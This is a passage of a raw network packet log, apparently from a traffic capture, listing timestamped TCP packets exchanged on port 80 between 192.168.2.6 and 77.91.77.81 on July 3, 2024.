                                                                Jul 3, 2024 08:38:25.580327034 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.580336094 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.580347061 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.580354929 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.580354929 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.580379009 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.580892086 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.580904007 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.580914021 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.580924988 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.580931902 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.580936909 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.580949068 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.580960035 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.580970049 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.580980062 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.580986977 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.580986977 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.580991030 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.581002951 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.581017971 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.581026077 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.581026077 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.581031084 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.581053019 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.581120968 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.581382036 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.581393957 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.581403971 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.581423998 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.581435919 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.581446886 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.581458092 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.581468105 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.581468105 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.581500053 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.581500053 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.608680010 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.608714104 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.608726978 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.608841896 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.608854055 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.608864069 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.608870029 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.608870029 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.608907938 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.609203100 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.609215021 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.609225035 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.609236956 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.609247923 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.609257936 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.609267950 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.609267950 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.609268904 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.609311104 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.609311104 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.609330893 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.609363079 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.627715111 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.627732038 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.627754927 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.627765894 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.627777100 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.627789974 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.627800941 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.627811909 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.627825975 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.627832890 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.627891064 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.627902985 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.627912998 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.627923012 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.627923012 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.627933025 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.627943993 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.627954960 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.627980947 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.627980947 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.628031015 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.666275978 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.666387081 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.666423082 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.666434050 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.666445017 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.666455984 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.666462898 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.666466951 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.666480064 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.666490078 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.666491032 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.666503906 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.666518927 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.666537046 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.666543007 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.666552067 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.666589022 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.666652918 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.666662931 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.666673899 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.666680098 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.666685104 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.666697025 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.666707993 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.666707993 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.666735888 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.666837931 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.666866064 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.666948080 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.666958094 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.666969061 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.666979074 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.666980982 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.666990995 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.667001963 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.667006016 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.667013884 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.667025089 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.667032003 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.667052031 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.667258978 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.667269945 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.667279959 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.667289972 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.667316914 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.667398930 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.667409897 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.667419910 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.667428017 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.667437077 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.667448044 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.667455912 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.667480946 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.669558048 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.669593096 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.669612885 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.669624090 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.669642925 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.669667959 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.669719934 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.669730902 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.669749022 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.669771910 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.669825077 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.669836044 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.669847012 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.669855118 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.669883966 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.669945955 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.669975042 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.669995070 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.670006037 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.670022964 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.670048952 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.670178890 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.670190096 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.670201063 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.670208931 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.670212984 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.670226097 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.670236111 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.670236111 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.670248985 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.670259953 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.670264959 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.670272112 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.670284033 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.670300007 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.670564890 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.670578003 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.670588017 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.670597076 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.670599937 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.670612097 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.670623064 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.670629025 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.670640945 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.670650005 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.670672894 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.670847893 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.670877934 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.670959949 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.670970917 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.670980930 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.670991898 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.670994997 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.671004057 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.671014071 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.671020985 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.671041012 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.671216965 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.671227932 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.671237946 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.671247959 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.671250105 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.671274900 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.671323061 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.671334028 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.671344042 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.671351910 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.671355963 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.671366930 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.671377897 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.671381950 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.671389103 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.671401024 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.671406984 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.671413898 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.671425104 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.671427011 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.671446085 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.671468973 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.671902895 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.671916008 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.671940088 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.671969891 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.699213982 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.699245930 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.699287891 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.699342966 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.699346066 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.699359894 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.699363947 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.699418068 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.699450016 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.699460983 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.699471951 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.699485064 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.699538946 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.699615955 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.699626923 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.699637890 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.699650049 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.699652910 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.699661970 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.699680090 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.699712038 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.699836969 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.699848890 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.699873924 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.699898958 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.699913025 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.699924946 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.699937105 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.699948072 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.699949980 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.699959993 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.699971914 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.699976921 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.700007915 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.700220108 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.700258970 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.718189001 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.718223095 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.718236923 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.718313932 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.718327045 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.718338966 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.718350887 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.718352079 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.718362093 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.718374014 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.718394041 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.718410969 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.718445063 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.718482018 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.718556881 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.718568087 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.718579054 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.718591928 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.718595982 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.718609095 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.718621969 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.718693972 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.718759060 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.718796968 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.756982088 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.757021904 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.757033110 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.757071972 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.757091999 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.757114887 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.757144928 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.757148027 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.757157087 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.757168055 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.757184029 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.757188082 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.757215977 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.757330894 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.757342100 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.757354021 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.757365942 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.757366896 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.757394075 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.757419109 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.757493973 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.757505894 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.757529974 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.757550955 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.757671118 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.757682085 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.757693052 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.757703066 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.757707119 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.757714987 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.757725954 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.757734060 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.757738113 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.757749081 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.757764101 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.757782936 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.758013010 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.758023977 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.758034945 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.758061886 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.758074999 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.758151054 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.758162975 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.758173943 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.758183956 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.758188963 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.758218050 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.760296106 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.760309935 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.760322094 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.760348082 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.760380983 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.760433912 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.760445118 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.760462046 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.760473013 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.760473013 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.760498047 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.760498047 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.760523081 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.760550976 CEST4971380192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:25.760651112 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.760663986 CEST804971377.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:25.760675907 CEST804971377.91.77.81192.168.2.6
